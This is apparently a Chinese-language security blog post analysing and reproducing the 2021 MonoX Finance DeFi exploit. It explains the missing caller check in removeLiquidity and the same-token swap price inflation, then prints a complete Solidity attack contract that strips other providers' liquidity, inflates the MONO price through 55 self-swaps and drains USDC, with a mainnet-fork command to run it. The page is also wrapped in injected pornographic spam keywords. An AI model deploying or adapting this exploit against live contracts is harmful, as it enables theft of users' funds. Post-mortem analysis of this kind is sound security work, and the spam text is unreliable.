<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      【漏洞分析】DeFi 平臺(tái) MonoX Finance 漏洞分析及復(fù)現(xiàn)

      前言

      2021 年 11 ? 30 ?,DeFi 平臺(tái) MonoX Finance 遭遇攻擊,損失共計(jì)約 3100 萬美元。
      造成本次攻擊的漏洞主要有兩個(gè):

      1. 移除流動(dòng)性的函數(shù)未對(duì)調(diào)用者進(jìn)行檢測(cè),使得任何用戶都可以移除提供者的流動(dòng)性。
      2. 代幣交換函數(shù)未對(duì)傳入的幣對(duì)進(jìn)行檢測(cè),可通過傳入相同的幣種抬高該幣價(jià)格。

      以太坊網(wǎng)絡(luò)

      攻擊者地址:0xecbe385f78041895c311070f344b55bfaa953258
      攻擊合約:0xf079d7911c13369e7fd85607970036d2883afcfd
      攻擊交易(block@13715025):
      https://etherscan.io/tx/0x9f14d093a2349de08f02fc0fb018dadb449351d0cdb7d0738ff69cc6fef5f299

      polygon網(wǎng)絡(luò)

      攻擊者地址 2:0x8f6a86f3ab015f4d03ddb13abb02710e6d7ab31b
      攻擊合約 2:0x119914de3ae03256fd58b66cd6b8c6a12c70cfb2
      攻擊交易 2:
      https://polygonscan.com/tx/0x5a03b9c03eedcb9ec6e70c6841eaa4976a732d050a6218969e39483bb3004d5d

      兩個(gè)網(wǎng)絡(luò)上的攻擊手段相同,在本文中只對(duì)以太坊網(wǎng)絡(luò)的攻擊進(jìn)行分析。

      項(xiàng)目信息

      首先通過閱讀官方文檔對(duì)整個(gè)項(xiàng)目進(jìn)行了解:MonoX docs
      攻擊的交易信息:【ethtx】0x9f14d093a2349de08f02fc0fb018dadb449351d0cdb7d0738ff69cc6fef5f299

      以下是關(guān)鍵點(diǎn)摘要:

      • Single Token Liquidity pools function by grouping the deposited token into a virtual pair with our virtual USD stablecoin (vCASH), instead of having the liquidity provider deposit multiple pool pairs, they only have to deposit one.
      • All the pools/pairs are in the same ERC1155 contract. Monoswap
      • In exchange for providing liquidity, the LP receives their share of the liquidity reserve and the ERC1155 LP token. Liquidity providers receive a share of the fees proportional to their share of the liquidity reserve.
      • When one removes liquidity from the pool for Token A, the price of the token stays the same. The pool burns the liquidity provider’s ERC 1155 LP token. In exchange, the pool transfers to the user their share of Token A’s virtual pair’s net value. When the vCASH balance is positive, the user will get their share of vCASH plus their share of Token A. When the vCASH balance is negative, the user will receive their share of Token A, minus their share of vCASH debt valued in Token A.
      • LPs providing liquidity in selected/promo pools will get non-transferrable $MONO shares. MONO-ERC20

      項(xiàng)目合約地址

      • Monoswap address: 0xC36a7887786389405EA8DA0B87602Ae3902B88A1
      • MonoXPool address: 0x59653E37F8c491C3Be36e5DD4D503Ca32B5ab2f4
      • MONO address: 0x2920f7d6134f4669343e70122cA9b8f19Ef8fa5D
      • vCASH address: 0x532D7ebE4556216490c9d03460214b58e4933454

      攻擊流程分析

      攻擊的目的是極大地提高 MONO 的價(jià)格,然后用 MONO 通過 MonoSwap 換取其他代幣

      1. 攻擊合約向 WETH 存 0.1 個(gè) ETH,并授權(quán)給 Monoswap 的代理合約

      2. 用 0.1 WETH 從 Monoswap 中換出 79.986094311542621010 MONO

      3. 調(diào)用 Monoswap 的 pools 函數(shù),查詢 MONO-vCash 的相關(guān)信息

        pid=10, lastPoolValue=531057465205747239605262, token=MONO, status=2, vcashDebt=0, vcashCredit=417969352001142975260, tokenBalance=101764473116983332370454, price=5218495054176274115, createdAt=1637853228
        
      4. 調(diào)用 MonoXPool 的 totalSupplyOf 函數(shù), 查詢 MONO-vCash 池子中作為 LP 證明的 MONO 的總量。

      5. 調(diào)用 MonoXPool 的 balanceOf 函數(shù),查詢提供大量流動(dòng)性的用戶(要移除流動(dòng)性的目標(biāo))在 MONO-vCash 池子中作為 LP 證明的 MONO 數(shù)量。提供流動(dòng)性的用戶可以在其 token 頁面找到(只有三位用戶提供了流動(dòng)性)。

      6. 移除提供大量流動(dòng)性的用戶的流動(dòng)性,使得池中的 vCash 為 0 ,MONO 為 0 。

        pid=10, lastPoolValue=1027394637, token=MONO, status=2, vcashDebt=0, vcashCredit=0, tokenBalance=0, price=5218495054176274115, createdAt=1637853228
        
      7. 往 MONO-vCash 池中添加流動(dòng)性 196875656 MONO 。獲得 927 liquidity .

        pid=10, lastPoolValue=1027394637, token=MONO, status=2, vcashDebt=0, vcashCredit=0, tokenBalance=196875656, price=5218495054176274115, createdAt=1637853228
        
      8. 調(diào)用 55 次 Monoswap.swapExactTokenForToken 函數(shù), 其中 tokenIn=MONO, tokenOut=MONO 。此舉的目的是為了提高 MONO 的價(jià)格,使得 amountOut > amountIn 。此時(shí)的 MONO 價(jià)格已經(jīng)大幅度上升到了 843741636512366463585990541128 。

        pid=10, lastPoolValue=1027394637, token=MONO, status=2, vcashDebt=0, vcashCredit=0, tokenBalance=28065601457649448980, price=843741636512366463585990541128, createdAt=1637853228
        
      9. 然后通過調(diào)用 swapTokenForExactToken 函數(shù),以高價(jià)的 MONO 換空池中的其他代幣,達(dá)到獲利的目的。

      代碼分析

      移除流動(dòng)性漏洞

      removeLiquidity 函數(shù)未對(duì)調(diào)用者進(jìn)行檢測(cè),使得任何用戶都可以移除提供者的流動(dòng)性。
      image

      價(jià)格提升漏洞

      整體的代碼流程如圖。通過傳入相同的代幣(tokenIn=MONO, tokenOut=MONO),大幅拉升該代幣的價(jià)格。
      image

      swapExactTokenForToken 函數(shù)
      image

      跟入 swapIn 函數(shù)
      image

      image

      getAmountOut函數(shù)
      image

      image
      _getNewPrice函數(shù)
      image

      _getAvgPrice函數(shù)
      image

      攻擊合約

      pragma solidity ^0.7.6;
      
      interface WETH9{
          function deposit() external payable;
          function approve(address guy, uint wad) external;
      }
      
      interface Monoswap{
          function swapExactTokenForToken(
          address tokenIn,
          address tokenOut,
          uint amountIn,
          uint amountOutMin,
          address to,
          uint deadline
          ) external;
      
          function removeLiquidity (address _token, uint256 liquidity, address to, 
          uint256 minVcashOut, 
          uint256 minTokenOut) external;
      
          function addLiquidity (address _token, uint256 _amount, address to) external;
      
          enum PoolStatus {
          UNLISTED,
          LISTED,
          OFFICIAL,
          SYNTHETIC,
          PAUSED
          }
      
          function pools(address) external view
              returns (
                  uint256 pid,
                  uint256 lastPoolValue,
                  address token,
                  PoolStatus status,
                  uint112 vcashDebt,
                  uint112 vcashCredit,
                  uint112 tokenBalance,
                  uint256 price,
                  uint256 createdAt
              );
          
          function swapTokenForExactToken(
              address tokenIn,
              address tokenOut,
              uint amountInMax,
              uint amountOut,
              address to,
              uint deadline
              ) external;
      }
      
      interface MonoXPool{
          function balanceOf(address account, uint256 id) external returns (uint256);
      }
      
      interface MonoToken{
          function approve(address spender, uint256 amount) external;
          function balanceOf(address account) external returns(uint256);
      }
      
      contract attack{
          address WETH9_address = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
          address vCash_address = 0x532D7ebE4556216490c9d03460214b58e4933454;
          address MONO_address = 0x2920f7d6134f4669343e70122cA9b8f19Ef8fa5D;
          address USDC_address =  0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48;
      
          address MonoXPool_address = 0x59653E37F8c491C3Be36e5DD4D503Ca32B5ab2f4;
          address Monoswap_address =  0xC36a7887786389405EA8DA0B87602Ae3902B88A1;
      
          // the only 3 MONO liquidity providers
          address LiquidityProvider1 = 0x7B9aa6ED8B514C86bA819B99897b69b608293fFC;
          address LiquidityProvider2 = 0x81D98c8fdA0410ee3e9D7586cB949cD19FA4cf38;
          address LiquidityProvider3 = 0xab5167e8cC36A3a91Fd2d75C6147140cd1837355;
      
          // Please deplay with 0.1 eth.
          function S1_Get_and_Approve_WETH() public{
              WETH9(WETH9_address).deposit{value:0.1 ether, gas:40000}();
              WETH9(WETH9_address).approve(Monoswap_address,0.1 ether);
          }
      
          // Swap the token form WETH to MONO in Monoswap.
          function S2_Swap_form_WETH_to_MONO() public{
              Monoswap(Monoswap_address).swapExactTokenForToken(WETH9_address, MONO_address, 0.1 ether, 1, address(this), block.timestamp);
          }
      
          // Remove the liqiudity of MONO pool.
          function S3_Remove_Liquidity() public{
              // Get the MONO banlance of provider, then remove it.
              uint256 balanceOfProvider1 = MonoXPool(MonoXPool_address).balanceOf(LiquidityProvider1, 10);
              Monoswap(Monoswap_address).removeLiquidity(MONO_address, balanceOfProvider1, LiquidityProvider1, 0, 0);
      
              uint256 balanceOfProvider2 = MonoXPool(MonoXPool_address).balanceOf(LiquidityProvider2, 10);
              Monoswap(Monoswap_address).removeLiquidity(MONO_address, balanceOfProvider2, LiquidityProvider2, 0, 0);
      
              uint256 balanceOfProvider3 = MonoXPool(MonoXPool_address).balanceOf(LiquidityProvider3, 10);
              Monoswap(Monoswap_address).removeLiquidity(MONO_address, balanceOfProvider3, LiquidityProvider3, 0, 0);
              // After this step, the MONO and vCash banlances of pool is 0.
              // But the price of MONO has not changed.
          }
      
          // Approve and add liqiudity to the MONO pool.
          function S4_Add_Liqiudity_of_MONO() public{
              MonoToken(MONO_address).approve(Monoswap_address, type(uint256).max);
              // The attacker add 196875656 MONO.
              Monoswap(Monoswap_address).addLiquidity(MONO_address, 196875656, address(this));
          }
      
          // To raise the price of MONO by swap MONO to MONO 55 times.
          function S5_Raise_MONO_Price() public{
              uint112 MONO_InPool;
              for(uint256 i = 0; i < 55; i++){
                  // Get amount of MONO in pool.
                  (,,,,,,MONO_InPool,,) = Monoswap(Monoswap_address).pools(MONO_address);
                  // Swap MONO to MONO.
                  Monoswap(Monoswap_address).swapExactTokenForToken(MONO_address, MONO_address, MONO_InPool-1, 0, address(this), block.timestamp);
              }
          }
      
          // Swaping the USDC by high price MONO.
          function S6_Swap_MONO_to_USDC() public{
              // Get the MONO balance of this contract.
              uint256 MONO_InThis;
              MONO_InThis = MonoToken(MONO_address).balanceOf(address(this));
      
              // Get the USDC banlance of pool.
              // uint256 USDC_InPool;
              //(,,,,,,USDC_InPool,,) = Monoswap(Monoswap_address).pools(USDC_address);
      
              // Using MONO to swap 4000000000000 USDC, while 4000000000000 < USDC_InPool.
              Monoswap(Monoswap_address).swapTokenForExactToken(Monoswap_address, USDC_address, MONO_InThis, 4000000000000, msg.sender, block.timestamp);
          }
      
          // Because MonoXPool is ERC1155 contract, this function is necessary.
          function onERC1155Received(address _operator, address _from, uint256 _id, uint256 _value, bytes calldata _data) external returns(bytes4){
              bytes4 a = bytes4(keccak256("onERC1155Received(address,address,uint256,uint256,bytes)"));
              // a = 0xf23a6e61
              return a;
          }
      
          receive() payable external{}
      }
      

      漏洞復(fù)現(xiàn)

      要設(shè)置 -l gas limit,否則會(huì)不夠用。

      ganache-cli --fork https://eth-mainnet.alchemyapi.io/v2/{your key}@13715025 -l 4294967295
      

      導(dǎo)入賬戶
      image

      部署合約,并往合約轉(zhuǎn)入 0.1 eth
      image

      image

      image

      依次調(diào)用攻擊合約中的攻擊函數(shù)
      image

      攻擊結(jié)果
      image

      參考文章

      1. 【github】W2Ning/MonoX_Vul_
      2. 【慢霧】DeFi 平臺(tái) MonoX Finance 被黑分析
      3. 【MonoX】MonoX docs
      4. 【ethtx】0x9f14d093a2349de08f02fc0fb018dadb449351d0cdb7d0738ff69cc6fef5f299
      posted @ 2021-12-10 21:06  ACai_sec  閱讀(1226)  評(píng)論(0)    收藏  舉報(bào)
      主站蜘蛛池模板: 丁香五月婷激情综合第九色| 欧美精品人人做人人爱视频| 夜夜嗨久久人成在日日夜夜| 男人一天堂精品国产乱码| 国产在线欧美日韩精品一区| 湖南省| 乱人伦人妻系列| 欧美成人精品手机在线| 亚洲性一交一乱一伦视频| 啊┅┅快┅┅用力啊岳网站| 精品视频不卡免费观看| 日韩av毛片福利国产福利| 草草线在成年免费视频2 | 亚洲精品麻豆一二三区| 国产成人精品无码免费看| 国产人妻精品无码av在线| 在线a亚洲v天堂网2018| 亚洲美女厕所偷拍美女尿尿 | 国产女人看国产在线女人| 无码视频伊人| 免费无码黄网站在线观看| 亚洲全乱码精品一区二区| 亚洲色最新高清AV网站| av高清无码 在线播放| 国内自拍第一区二区三区| 强奷乱码中文字幕| 久久99精品九九九久久婷婷| 吉林省| 国产仑乱无码内谢| 国产成人综合欧美精品久久| 精品人妻中文字幕av| 乱60一70归性欧老妇| 国产99久久无码精品| 精品国产迷系列在线观看| 国产精品国产三级国产专业| 成年女人免费v片| 九九热在线免费视频精品| 免费看欧美全黄成人片| 姐姐6电视剧在线观看| 免费看一区无码无a片www| 亚洲第一成人网站|